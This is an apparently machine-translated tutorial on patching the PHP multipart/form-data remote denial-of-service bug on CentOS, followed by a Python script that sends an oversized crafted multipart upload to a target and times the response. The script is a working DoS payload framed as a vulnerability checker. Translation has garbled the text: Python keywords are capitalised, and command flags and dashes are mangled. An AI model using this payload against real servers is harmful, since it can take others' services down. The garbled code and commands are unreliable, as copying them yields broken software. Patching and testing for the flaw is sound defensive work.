Multipart/form-data vulnerability Patch Repair in PHP

Source: Internet
Author: User
Tags datetime fpm mysql tutorial php compiler centos zend

Today in the dark clouds to see PHP multipart/form-data remote dos Vulnerability, immediately to colleagues to contact the online server to play a patch, first to a CentOS compile installation nginx+php-fpm+mysql tutorial, if it is based on my installation, Then you can go on and do it, if not, then take a look.
System: CentOS 5.x (64-bit)
Required Software: Php-5.2-multipart-form-data.patch
1. View your PHP version
Php-v
PHP 5.2.17p1 (CLI) (built:oct 29 2015 15:31:06)
Copyright (c) 1997-2010 the PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2010 Zend Technologies

If the version is higher than 5.3, you can upgrade PHP directly.

2. Download the patch file
wget Http://soft.vpser.net/web/php/bug/php-5.2-multipart-form-data.patch
Or
Wget/php_patch/php-5.2-multipart-form-data.patch

3. Install the patch
5.2:
CP Php-5.2-multipart-form-data.patch ~/install/php-5.2.17/
CD php-5.2.17
Patch-p1 < Php-5.2-multipart-form-data.patch

5.3:
wget Http://soft.vpser.net/web/php/bug/php-5.3-multipart-form-data.patch
Patch-p1 < Php-5.3-multipart-form-data.patch

Remove 42 lines to 45 lines:

If ["$php _version" = = "$old _php_version"]; Then
echo "Error:the upgrade PHP Version is the same as the old version!!"
Exit 1
Fi

4. Re-compile PHP

./configure--prefix=/usr/local/php--enable-fastcgi--enable-fpm--with-fpm-log=/var/log/php-fpm.log \
--with-fpm-conf=/etc/php-fpm.conf--with-fpm-pid=/var/run/php-fpm.pid--with-config-file-path=/etc \
--WITH-CONFIG-FILE-SCAN-DIR=/ETC/PHP.D--with-openssl--with-zlib--enable-bcmath--with-bz2--with-curl \
--enable-ftp--with-gd--enable-gd-native-ttf--with-jpeg-dir--with-png-dir--with-gettext \
--enable-mbstring--with-mcrypt--enable-soap--enable-zip--with-iconv=/usr/local/libiconv \
--with-mysql=/usr/local/mysql--with-mysqli=/usr/local/mysql/bin/mysql_config--without-pear

PS: You'd better check your own PHP compiler parameters, Php-i|grep configure


Make && make install

All right, so we're done with the leak, so how do we detect it? See the following script:
Cat dd.py

'''
Author:shusheng liu,the Department of security Cloud, Baidu
Email:liusscs@163.com
'''
Import Sys
Import Urllib,urllib2
Import datetime
From Optparse import Optionparser

def http_proxy (Proxy_url):

Proxy_handler = Urllib2. Proxyhandler ({"http": Proxy_url})
Null_proxy_handler = Urllib2. Proxyhandler ({})
Opener = Urllib2.build_opener (Proxy_handler)
Urllib2.install_opener (opener)
#end Http_proxy

def check_php_multipartform_dos (url,post_body,headers):
req = Urllib2. Request (URL)
For key in Headers.keys ():
Req.add_header (Key,headers[key])
StartTime = Datetime.datetime.now ();
FD = Urllib2.urlopen (req,post_body)
html = Fd.read ()
Endtime = Datetime.datetime.now ()
Usetime= (endtime-starttime). seconds
if (Usetime > 5):
result = url+ ' is vulnerable ';
Else
if (Usetime > 3):
result = ' need to check normal respond time '
return [Result,usetime]
#end


def main ():
#http_proxy ("http://127.0.0.1:8089")
Parser = Optionparser ()
Parser.add_option ("T", "--target", action= "store",
Dest= "Target",
Default=false,
Type= "string",
help= "Test Target")
(options, args) = Parser.parse_args ()
if (options.target):
target = Options.target
Else
Return

num=650000
headers={' content-type ': ' multipart/form-data boundary=----webkitformboundaryx3b7rdmpcqlzmje1 ',
' accept-encoding ': ' gzip, deflate ',
' User-agent ': ' mozilla/5.0 (Windows NT 6.1; WOW64) applewebkit/537.36 (khtml, like Gecko) chrome/40.0.2214.111 safari/537.36 '}
BODY = "------webkitformboundaryx3b7rdmpcqlzmje1\ncontent-disposition:form-data; Name=\ "File\"; Filename=sp.jpg "
Payload= ""
For I in Range (0,num):
Payload = payload + "a\n"
BODY = body + payload;
BODY = body + "content-type:application/octet-stream\r\n\r\ndatadata\r\n------webkitformboundaryx3b7rdmpcqlzmje1-- "
Print "Starting ...";
Respond=check_php_multipartform_dos (Target,body,headers)
Print "Result:"
Print Respond[0]
Print "Respond Time:" +str (respond[1]) + "seconds";

If __name__== "__main__":
Main ()

This script is used for testing, and if you do bad things, it has nothing to do with this site.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.